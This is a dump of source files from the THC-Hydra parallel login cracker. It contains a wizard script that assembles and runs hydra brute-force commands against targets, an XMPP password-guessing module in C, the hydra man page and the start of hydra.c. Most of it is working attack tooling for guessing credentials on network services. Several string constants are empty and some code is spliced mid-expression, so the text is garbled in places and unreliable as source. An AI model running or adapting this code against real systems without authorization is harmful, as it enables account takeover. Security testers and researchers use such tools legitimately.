Wizard\"\necho\nread -p \"Enter the service to attack (eg: ftp, ssh, http-post-form): \" service\ntest -z \"$service\" && { echo Error: service may not be empty ; exit 1 ; }\nread -p \"Enter the target to attack (or filename with targets): \" target\ntest -z \"$target\" && { echo Error: target may not be empty ; exit 1 ; }\nread -p \"Enter a username to test or a filename: \" user\ntest -z \"$user\" && { echo Error: user may not be empty ; exit 1 ; }\nread -p \"Enter a password to test or a filename: \" pass\ntest -z \"$pass\" && { echo Error: pass may not be empty ; exit 1 ; }\nread -p \"If you want to test for passwords (s)ame as login, (n)ull or (r)everse login, enter these letters without spaces (e.g. \\\"sr\\\") or leave empty otherwise: \" pw\nread -p \"Port number (press enter for default): \" port\necho\necho The following options are supported by the service module:\nhydra -U $service\necho\nread -p \"If you want to add module options, enter them here (or leave empty): \" opt\necho\n\nports=\"\"\npws=\"\"\nopts=\"\"\ntest -e \"$target\" && targets=\"-M $target\"\ntest -e \"$target\" || targets=\"$target\"\ntest -e \"$user\" && users=\"-L $user\"\ntest -e \"$user\" || users=\"-l $user\"\ntest -e \"$pass\" && passs=\"-P $pass\"\ntest -e \"$pass\" || passs=\"-p $pass\"\ntest -n \"$port\" && ports=\"-s $port\"\ntest -n \"$pw\" && pws=\"-e $pw\"\ntest -n \"$opt\" && { opts=\"-m $opt\" ; dopts=\"-m '$opt'\" ; }\n\necho The following command will be executed now:\necho \" hydra $users $passs -u $pws $ports $dopts $targets $service\"\necho\nread -p \"Do you want to run the command now? [Y/n] \" yn\ntest \"$yn\" = \"n\" -o \"$yn\" = \"N\" && { echo Exiting. ; exit 0 ; }\necho\nhydra $users $passs -u $pws $ports $opts $targets $service\n" }, { "path": "hydra-xmpp.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\n/* david: ref http://xmpp.org/rfcs/rfc3920.html */\n\nextern char *HYDRA_EXIT;\nstatic char *domain = NULL;\n\nint32_t xmpp_auth_mechanism = AUTH_ERROR;\n\nchar *JABBER_CLIENT_INIT_STR = \"\";\n\nint32_t start_xmpp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\\\"\\\"\", *result = NULL;\n char *login, *pass, buffer[500], buffer2[500];\n char *AUTH_STR = \"\";\n char *CHALLENGE_STR = \"\";\n char *CHALLENGE_STR2 = \"\";\n char *CHALLENGE_END_STR = \"\";\n char *RESPONSE_STR = \"\";\n char *RESPONSE_END_STR = \"\";\n char *fooptr, *buf;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n switch (xmpp_auth_mechanism) {\n case AUTH_SCRAMSHA1:\n sprintf(buffer, \"%s%s%s\", AUTH_STR, \"SCRAM-SHA-1\", AUTH_STR_END);\n break;\n case AUTH_CRAMMD5:\n sprintf(buffer, \"%s%s%s\", AUTH_STR, \"CRAM-MD5\", AUTH_STR_END);\n break;\n case AUTH_DIGESTMD5:\n sprintf(buffer, \"%s%s%s\", AUTH_STR, \"DIGEST-MD5\", AUTH_STR_END);\n break;\n case AUTH_PLAIN:\n sprintf(buffer, \"%s%s%s\", AUTH_STR, \"PLAIN\", AUTH_STR_END);\n break;\n default:\n sprintf(buffer, \"%s%s%s\", AUTH_STR, \"LOGIN\", AUTH_STR_END);\n break;\n }\n\n hydra_send(s, buffer, strlen(buffer), 0);\n usleepn(300);\n if ((buf = hydra_receive_line(s)) == NULL)\n return 3;\n\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\\n\", buf);\n\n if ((strstr(buf, CHALLENGE_STR) != NULL) || (strstr(buf, CHALLENGE_STR2) != NULL)) {\n /*\n the challenge string is sent depending of the\n auth chosen it's the case for login auth\n */\n\n char *ptr = strstr(buf, CHALLENGE_STR);\n\n if (!ptr)\n ptr = strstr(buf, CHALLENGE_STR2);\n char *ptr_end = strstr(ptr, CHALLENGE_END_STR);\n int32_t chglen = ptr_end - ptr - strlen(CHALLENGE_STR);\n\n if ((chglen > 0) && (chglen < sizeof(buffer2))) {\n strncpy(buffer2, ptr + strlen(CHALLENGE_STR), chglen);\n buffer2[chglen] = '\\0';\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buffer2);\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\\n\", buffer);\n }\n\n switch (xmpp_auth_mechanism) {\n case AUTH_LOGIN: {\n if (strstr(buffer, \"sername\") != NULL) {\n strncpy(buffer2, login, sizeof(buffer2) - 1);\n buffer2[sizeof(buffer2) - 1] = '\\0';\n\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%s%.250s%s\", RESPONSE_STR, buffer2, RESPONSE_END_STR);\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n free(buf);\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n /* server now would ask for the password */\n if ((strstr(buf, CHALLENGE_STR) != NULL) || (strstr(buf, CHALLENGE_STR2) != NULL)) {\n char *ptr = strstr(buf, CHALLENGE_STR);\n\n if (!ptr)\n ptr = strstr(buf, CHALLENGE_STR2);\n char *ptr_end = strstr(ptr, CHALLENGE_END_STR);\n int32_t chglen = ptr_end - ptr - strlen(CHALLENGE_STR);\n\n if ((chglen > 0) && (chglen < sizeof(buffer2))) {\n strncpy(buffer2, ptr + strlen(CHALLENGE_STR), chglen);\n buffer2[chglen] = '\\0';\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buffer2);\n if (strstr(buffer, \"assword\") != NULL) {\n strncpy(buffer2, pass, sizeof(buffer2) - 1);\n buffer2[sizeof(buffer2) - 1] = '\\0';\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%s%.250s%s\", RESPONSE_STR, buffer2, RESPONSE_END_STR);\n }\n } else {\n hydra_report(stderr, \"[ERROR] xmpp could not extract challenge from server\\n\");\n free(buf);\n return 1;\n }\n }\n }\n } break;\n#ifdef LIBOPENSSL\n case AUTH_PLAIN: {\n memset(buffer2, 0, sizeof(buffer));\n result = sasl_plain(buffer2, login, pass);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%s%.250s%s\", RESPONSE_STR, buffer2, RESPONSE_END_STR);\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", buffer);\n\n } break;\n case AUTH_CRAMMD5: {\n int32_t rc = 0;\n char *preplogin;\n\n memset(buffer2, 0, sizeof(buffer2));\n result = sasl_cram_md5(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n\n rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n if (rc) {\n free(buf);\n return 3;\n }\n\n sprintf(buffer, \"%.200s %.250s\", preplogin, buffer2);\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", buffer);\n hydra_tobase64((unsigned char *)buffer, strlen(buffer), sizeof(buffer));\n sprintf(buffer2, \"%s%.250s%s\", RESPONSE_STR, buffer, RESPONSE_END_STR);\n strncpy(buffer, buffer2, sizeof(buffer) - 1);\n buffer[sizeof(buffer) - 1] = '\\0';\n free(preplogin);\n } break;\n case AUTH_DIGESTMD5: {\n memset(buffer2, 0, sizeof(buffer2));\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, buffer, domain, \"xmpp\", NULL, 0, NULL);\n if (result == NULL) {\n free(buf);\n return 3;\n }\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", buffer2);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n snprintf(buffer, sizeof(buffer), \"%s%s%s\", RESPONSE_STR, buffer2, RESPONSE_END_STR);\n } break;\n case AUTH_SCRAMSHA1: {\n /*client-first-message */\n char clientfirstmessagebare[200];\n char *preplogin;\n int32_t rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n\n if (rc) {\n free(buf);\n return 3;\n }\n\n snprintf(clientfirstmessagebare, sizeof(clientfirstmessagebare), \"n=%s,r=hydra\", preplogin);\n free(preplogin);\n sprintf(buffer2, \"n,,%.200s\", clientfirstmessagebare);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n snprintf(buffer, sizeof(buffer), \"%s%s%s\", RESPONSE_STR, buffer2, RESPONSE_END_STR);\n\n free(buf);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n\n if ((strstr(buf, CHALLENGE_STR) != NULL) || (strstr(buf, CHALLENGE_STR2) != NULL)) {\n char serverfirstmessage[200];\n char *ptr = strstr(buf, CHALLENGE_STR);\n\n if (!ptr)\n ptr = strstr(buf, CHALLENGE_STR2);\n char *ptr_end = strstr(ptr, CHALLENGE_END_STR);\n int32_t chglen = ptr_end - ptr - strlen(CHALLENGE_STR);\n\n if ((chglen > 0) && (chglen < sizeof(buffer2))) {\n strncpy(buffer2, ptr + strlen(CHALLENGE_STR), chglen);\n buffer2[chglen] = '\\0';\n } else {\n hydra_report(stderr, \"[ERROR] xmpp could not extract challenge from server\\n\");\n free(buf);\n return 1;\n }\n\n /*server-first-message */\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buffer2);\n strncpy(serverfirstmessage, buffer, sizeof(serverfirstmessage) - 1);\n serverfirstmessage[sizeof(serverfirstmessage) - 1] = '\\0';\n\n memset(buffer2, 0, sizeof(buffer2));\n fooptr = buffer2;\n result = sasl_scram_sha1(fooptr, pass, clientfirstmessagebare, serverfirstmessage);\n if (result == NULL) {\n hydra_report(stderr, \"[ERROR] Can't compute client response\\n\");\n free(buf);\n return 1;\n }\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n snprintf(buffer, sizeof(buffer), \"%s%s%s\", RESPONSE_STR, buffer2, RESPONSE_END_STR);\n } else {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not a valid server challenge\\n\");\n free(buf);\n return 1;\n }\n } break;\n#endif\n ptr = 0;\n }\n\n free(buf);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n usleepn(50);\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n\n // we test the challenge tag as digest-md5 when connected is sending\n // \"rspauth\" value so if we are receiving a second challenge we assume the\n // auth is good\n\n if ((strstr(buf, \"= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n memset(buffer, 0, sizeof(buffer));\n snprintf(buffer, sizeof(buffer), \"%s%s%s\", JABBER_CLIENT_INIT_STR, domain, JABBER_CLIENT_INIT_END_STR);\n if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {\n hydra_child_exit(1);\n }\n // some server is longer to answer\n usleepn(300);\n do {\n if ((buf = hydra_receive_line(sock)) == NULL) {\n /* no auth method identified */\n hydra_report(stderr, \"[ERROR] no authentication methods can be identified\\n\");\n hydra_child_exit(1);\n }\n\n if (strstr(buf, \"SCRAM-SHA-1\") != NULL) {\n xmpp_auth_mechanism = AUTH_SCRAMSHA1;\n }\n if (strstr(buf, \"CRAM-MD5\") != NULL) {\n xmpp_auth_mechanism = AUTH_CRAMMD5;\n }\n if (strstr(buf, \"DIGEST-MD5\") != NULL) {\n xmpp_auth_mechanism = AUTH_DIGESTMD5;\n }\n if (strstr(buf, \"PLAIN\") != NULL) {\n xmpp_auth_mechanism = AUTH_PLAIN;\n }\n if (strstr(buf, \"LOGIN\") != NULL) {\n xmpp_auth_mechanism = AUTH_LOGIN;\n }\n }\n free(buf);\n } while (xmpp_auth_mechanism == AUTH_ERROR);\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n int32_t i;\n\n for (i = 0; i < strlen(miscptr); i++)\n miscptr[i] = (char)toupper((int32_t)miscptr[i]);\n\n if (strncmp(miscptr, \"LOGIN\", 5) == 0)\n xmpp_auth_mechanism = AUTH_LOGIN;\n\n if (strncmp(miscptr, \"PLAIN\", 5) == 0)\n xmpp_auth_mechanism = AUTH_PLAIN;\n\n#ifdef LIBOPENSSL\n if (strncmp(miscptr, \"CRAM-MD5\", 8) == 0)\n xmpp_auth_mechanism = AUTH_CRAMMD5;\n\n if (strncmp(miscptr, \"SCRAM-SHA1\", 10) == 0)\n xmpp_auth_mechanism = AUTH_SCRAMSHA1;\n\n if (strncmp(miscptr, \"DIGEST-MD5\", 10) == 0)\n xmpp_auth_mechanism = AUTH_DIGESTMD5;\n#endif\n }\n\n if (verbose) {\n switch (xmpp_auth_mechanism) {\n case AUTH_LOGIN:\n hydra_report(stderr, \"[VERBOSE] using XMPP LOGIN AUTH mechanism\\n\");\n break;\n case AUTH_PLAIN:\n hydra_report(stderr, \"[VERBOSE] using XMPP PLAIN AUTH mechanism\\n\");\n break;\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n hydra_report(stderr, \"[VERBOSE] using XMPP CRAM-MD5 AUTH mechanism\\n\");\n break;\n case AUTH_SCRAMSHA1:\n hydra_report(stderr, \"[VERBOSE] using XMPP SCRAM-SHA1 AUTH mechanism\\n\");\n break;\n case AUTH_DIGESTMD5:\n hydra_report(stderr, \"[VERBOSE] using XMPP DIGEST-MD5 AUTH mechanism\\n\");\n break;\n#endif\n }\n }\n#ifdef LIBOPENSSL\n // check if tls is not wanted and if tls is available\n if (!disable_tls && tls) {\n char *STARTTLS = \"\";\n\n hydra_send(sock, STARTTLS, strlen(STARTTLS), 0);\n usleepn(300);\n buf = hydra_receive_line(sock);\n\n if (buf == NULL || strstr(buf, \"= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_xmpp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_xmpp(const char *service) {\n printf(\"Module xmpp is optionally taking one authentication type of:\\n\"\n \" LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1\\n\\n\"\n \"Note, the target passed should be a fdqn as the value is used in the \"\n \"Jabber init request, example: hermes.jabber.org\\n\\n\");\n}\n" }, { "path": "hydra.1", "content": ".TH \"HYDRA\" \"1\" \"01/01/2023\"\n.SH NAME\nhydra \\- a very fast network logon cracker which supports many different services\n.SH SYNOPSIS\n.B hydra\n [[[\\-l LOGIN|\\-L FILE] [\\-p PASS|\\-P FILE|\\-x OPT \\-y]] | [\\-C FILE]]\n [\\-e nsr] [\\-u] [\\-f|\\-F] [\\-M FILE] [\\-o FILE] [\\-b FORMAT]\n [\\-t TASKS] [\\-T TASKS] [\\-w TIME] [\\-W TIME] [\\-m OPTIONS] [\\-s PORT]\n [\\-c TIME] [\\-S] [\\-O] [\\-4|6] [\\-I] [\\-vV] [\\-d]\n server service [OPTIONS]\n.br\n.SH DESCRIPTION\nHydra is a parallelized login cracker which supports numerous protocols\nto attack. New modules are easy to add, beside that, it is flexible and\nvery fast.\n.LP\nThis tool gives researchers and security consultants the possibility to\nshow how easy it would be to gain unauthorized access from remote to a\nsystem.\n.TP\nCurrently this tool supports:\nadam6500 afp asterisk cisco cisco-enable cvs firebird ftp ftps\nhttp[s]-{head|get|post} http[s]-{get|post}-form http-proxy\nhttp-proxy-urlenum icq imap[s] irc ldap2[s]\nldap3[-{cram|digest}md5][s] mssql mysql(v4) mysql5 ncp nntp\noracle oracle-listener oracle-sid pcanywhere pcnfs pop3[s]\npostgres rdp radmin2 redis rexec rlogin rpcap rsh rtsp s7-300 sapr3 sip\nsmb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s]\nvmauthd vnc xmpp\n.LP\nFor most protocols SSL is supported (e.g. https-get, ftp-ssl, etc.).\nIf not all necessary libraries are found during compile time, your\navailable services will be less.\nType \"hydra\" to see what is available.\n.SH Options\n.TP\n.B target\na target to attack, can be an IPv4 address, IPv6 address or DNS name.\n.TP\n.B service\na service to attack, see the list of protocols available\n.TP\n.B OPTIONAL SERVICE PARAMETER\nSome modules have optional or mandatory options. type \"hydra \\-U \"\n to get help on on the options of a service.\n.TP\n.B \\-R \nrestore a previously aborted session. Requires a hydra.restore file was\nwritten. Options are restored, but can be changed by setting them after\n\\-R on the command line\n.TP\n.B \\-S\nconnect via SSL\n.TP\n.TP\n.B \\-O\nuse old SSL v2 and v3\n.TP\n.B \\-s PORT\nif the service is on a different default port, define it here\n.TP\n.B \\-l LOGIN\nor \\-L FILE login with LOGIN name, or load several logins from FILE\n.TP\n.B \\-p PASS\nor \\-P FILE try password PASS, or load several passwords from FILE\n.TP\n.B \\-x min:max:charset\ngenerate passwords from min to max length. charset can contain 1\n for numbers, a for lowcase and A for upcase characters.\n Any other character is added is put to the list. \n Example: 1:2:a1%.\n The generated passwords will be of length 1 to 2 and contain\n lowcase letters, numbers and/or percent signs and dots.\n.TP\n.B \\-y\ndisable use of symbols in \\-x bruteforce, see above\n.TP\n.B \\-e nsr\nadditional checks, \"n\" for null password, \"s\" try login as pass, \"r\" try the reverse login as pass\n.TP\n.B \\-C FILE\ncolon separated \"login:pass\" format, instead of \\-L/\\-P options\n.TP\n.B \\-u\nby default Hydra checks all passwords for one login and then tries the next\nlogin. This option loops around the passwords, so the first password is\ntried on all logins, then the next password.\n.TP\n.B \\-f\nexit after the first found login/password pair (per host if \\-M)\n.TP\n.B \\-F\nexit after the first found login/password pair for any host (for usage with \\-M)\n.TP\n.B \\-M FILE\nserver list for parallel attacks, one entry per line\n.TP\n.B \\-o FILE\nwrite found login/password pairs to FILE instead of stdout\n.TP\n.B \\-b FORMAT\nspecify the format for the \\-o FILE: text(default), json, jsonv1\n.TP\n.B \\-t TASKS\nrun TASKS number of connects in parallel (default: 16)\n.TP\n.B \\-m OPTIONS\nmodule specific options. See hydra -U what options are available.\n.TP\n.B \\-w TIME\ndefines the max wait time in seconds for responses (default: 32)\n.TP\n.B \\-W TIME\ndefines a wait time between each connection a task performs. This usually\nonly makes sense if a low task number is used, .e.g \\-t 1\n.TP\n.B \\-c TIME\nthe wait time in seconds per login attempt over all threads (-t 1 is recommended)\nThis usually only makes sense if a low task number is used, .e.g \\-t 1\n.TP\n.B \\-4 / \\-6 \nprefer IPv4 (default) or IPv6 addresses\n.TP\n.B \\-v / \\-V \nverbose mode / show login+pass combination for each attempt\n.TP\n.B \\-d\ndebug mode\n.TP\n.B \\-I\nignore an existing restore file (don't wait 10 seconds)\n.TP\n.B \\-h, \\-\\-help\nShow summary of options.\n.SH SEE ALSO\n.BR xhydra (1),\n.BR pw-inspector (1).\n.br\nThe programs are documented fully by van Hauser \n.SH AUTHOR\nhydra was written by van Hauser / THC \nFind new versions or report bugs at https://github.com/vanhauser-thc/thc-hydra\n.PP\nThis manual page was written by Daniel Echeverry ,\nfor the Debian project (and may be used by others).\n" }, { "path": "hydra.c", "content": "/*\n * hydra (c) 2001-2023 by van Hauser / THC \n * https://github.com/vanhauser-thc/thc-hydra\n *\n * Parallized network login hacker.\n * Please don't use in military or secret service organizations, or for illegal\n * purposes. This is a wish and is non-binding.\n * If you ignore this be sure you are not a good person though.\n *\n * License: GNU AFFERO GENERAL PUBLIC LICENSE v3.0, see LICENSE file\n */\n#include \"hydra.h\"\n#include \"bfg.h\"\n#include \n\n#ifdef LIBNCURSES\n#include \n#include \n#endif\n\nvoid usage_oracle(const char *service);\nvoid usage_oracle_listener(const char *service);\nvoid usage_cvs(const char *service);\nvoid usage_xmpp(const char *service);\nvoid usage_pop3(const char *service);\nvoid usage_rdp(const char *service);\nvoid usage_s7_300(const char *service);\nvoid usage_nntp(const char *service);\nvoid usage_imap(const char *service);\nvoid usage_smtp_enum(const char *service);\nvoid usage_smtp(const char *service);\nvoid usage_svn(const char *service);\nvoid usage_ncp(const char *service);\nvoid usage_firebird(const char *service);\nvoid usage_mysql(const char *service);\nvoid usage_mongodb(const char *service);\nvoid usage_irc(const char *service);\nvoid usage_postgres(const char *service);\nvoid usage_telnet(const char *service);\nvoid usage_sapr3(const char *service);\nvoid usage_sshkey(const char *service);\nvoid usage_cisco_enable(const char *service);\nvoid usage_cisco(const char *service);\nvoid usage_ldap(const char *service);\nvoid usage_smb(const char *service);\nvoid usage_http_form(const char *service);\nvoid usage_http_proxy(const char *service);\nvoid usage_http_proxy_urlenum(const char *service);\nvoid usage_snmp(const char *service);\nvoid usage_http(const char *service);\nvoid usage_smb2(const char *service);\n\nextern void service_asterisk(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_telnet(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_ftp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_ftps(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_pop3(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_vmauthd(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_imap(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_ldap2(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_ldap3(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_ldap3_cram_md5(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_ldap3_digest_md5(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_adam6500(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_cisco(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_cisco_enable(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_vnc(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_socks5(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_rexec(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_rlogin(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_rsh(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_nntp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_http_head(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_http_get(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_http_post(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_http_get_form(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_http_post_form(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_icq(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_pcnfs(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_mssql(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_cobaltstrike(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_cvs(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_snmp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_smtp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_smtp_enum(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_teamspeak(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_pcanywhere(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_http_proxy(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_xmpp(char *target, char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_irc(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_redis(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_http_proxy_urlenum(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_s7_300(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_rtsp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_rpcap(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n\n// ADD NEW SERVICES HERE\n\n#if defined(LIBSMBCLIENT)\nextern int32_t service_smb2_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_smb2(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n\n#ifdef HAVE_MATH_H\nextern void service_mysql(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_mysql_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBPOSTGRES\nextern void service_postgres(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_postgres_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBOPENSSL\nextern void service_smb(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_smb_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_oracle_listener(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_oracle_listener_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_oracle_sid(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_oracle_sid_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_sip(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_sip_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBFREERDP\nextern void service_rdp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_rdp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBSAPR3\nextern void service_sapr3(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_sapr3_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBFIREBIRD\nextern void service_firebird(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_firebird_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBAFP\nextern void service_afp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_afp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBNCP\nextern void service_ncp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_ncp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBSSH\nextern void service_ssh(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_ssh_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern void service_sshkey(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t 